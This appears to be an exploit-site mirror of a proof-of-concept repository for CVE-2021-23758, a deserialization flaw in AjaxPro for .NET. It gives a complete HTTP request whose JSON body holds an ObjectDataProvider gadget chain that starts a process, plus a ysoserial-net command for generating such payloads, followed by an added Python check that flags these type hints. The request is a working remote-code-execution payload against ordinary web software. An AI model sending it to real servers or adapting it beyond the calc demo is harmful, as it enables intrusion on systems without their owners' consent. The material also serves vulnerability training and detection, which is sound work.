## https://sploitus.com/exploit?id=9C5F7BCE-0D32-524F-AFDE-810763D8D028
# CVE-2021-23758-POC
This repo was created for training on the vulnerability in AjaxPro disclosed as CVE-2021-23758.
# POC
```
POST /ajaxpro/CVE_2021_23758_POC.demo,CVE_2021_23758.ashx HTTP/2
Host: localhost:44375
Content-Length: 567
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="96"
X-Ajaxpro-Method: TestAjax
Content-Type: text/plain; charset=UTF-8
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Accept: */*
Origin: https://localhost:44375
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://localhost:44375/demo
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7

{"obj":{
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
"MethodName":"Start",
"ObjectInstance":{
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
"StartInfo": {
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
"FileName":"cmd",
"Arguments":"/c calc"
}
}
}}
```
```
ysoserial-net -g ObjectDataProvider -f JavaScriptSerializer -c "calc" -o raw
```
![Back-Code](img/repo.jpg?raw=true "B-Code")
![Code](img/code.jpg?raw=true "Code")
![Exploit](img/calc.jpg?raw=true "Calc")
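A defender-side check for the request shown above, as an added example that is not part of the original repository: it walks the JSON body of requests under `/ajaxpro/` and reports every `__type` hint, rating the type names that appear in the POC as high. The function names, the `allowed_types` parameter and the severity labels are assumptions made for this sketch.

```python
import json

# Type names taken from the request shown on this page. Assumption: a real
# deployment would pass its own DTO types in allowed_types and flag the rest.
KNOWN_GADGET_PREFIXES = (
    "system.windows.data.objectdataprovider",
    "system.diagnostics.process",
)

# Constructed sample: the JSON body of the request above, arguments shortened.
SAMPLE_BODY = """{"obj": {
  "__type": "System.Windows.Data.ObjectDataProvider, PresentationFramework",
  "MethodName": "Start",
  "ObjectInstance": {
    "__type": "System.Diagnostics.Process, System",
    "StartInfo": {"__type": "System.Diagnostics.ProcessStartInfo, System",
                  "FileName": "cmd"}}}}"""


class Obj(list):
    """A JSON object kept as (key, value) pairs so duplicate keys survive."""


def find_type_hints(node, path="$"):
    """Yield (json_path, type_name) for every "__type" key at any depth."""
    if isinstance(node, Obj):
        for key, value in node:
            if key == "__type" and isinstance(value, str):
                yield path, value.split(",")[0].strip()
            else:
                yield from find_type_hints(value, f"{path}.{key}")
    elif isinstance(node, list):
        for i, item in enumerate(node):
            yield from find_type_hints(item, f"{path}[{i}]")


def inspect_ajaxpro_request(url_path, body, allowed_types=()):
    """Return (path, type, severity) findings; an empty list means no hint."""
    if not url_path.lower().startswith("/ajaxpro/"):
        return []
    try:
        doc = json.loads(body, object_pairs_hook=Obj)
    except ValueError:
        return [("$", "<unparseable body>", "review")]
    return [
        (path, name, "high" if name.lower().startswith(KNOWN_GADGET_PREFIXES) else "review")
        for path, name in find_type_hints(doc)
        if name not in allowed_types
    ]
```

Duplicate keys are kept as pairs because a parser that keeps only the last value for a repeated `__type` key would hide the other one from the check.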
# Reference
* [CVE-2021-23758 Mitre](https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-23758)
* [michaelschwarz/Ajax.NET-Professional](https://github.com/michaelschwarz/Ajax.NET-Professional)
* [Details](https://mp.weixin.qq.com/s/7y-iyMMZAoN4B2dGvCFvXg)
* [sirifu4k1 tweet](https://twitter.com/sirifu4k1/status/1470647490546393089)
* [ysoserial](https://github.com/pwntester/ysoserial.net)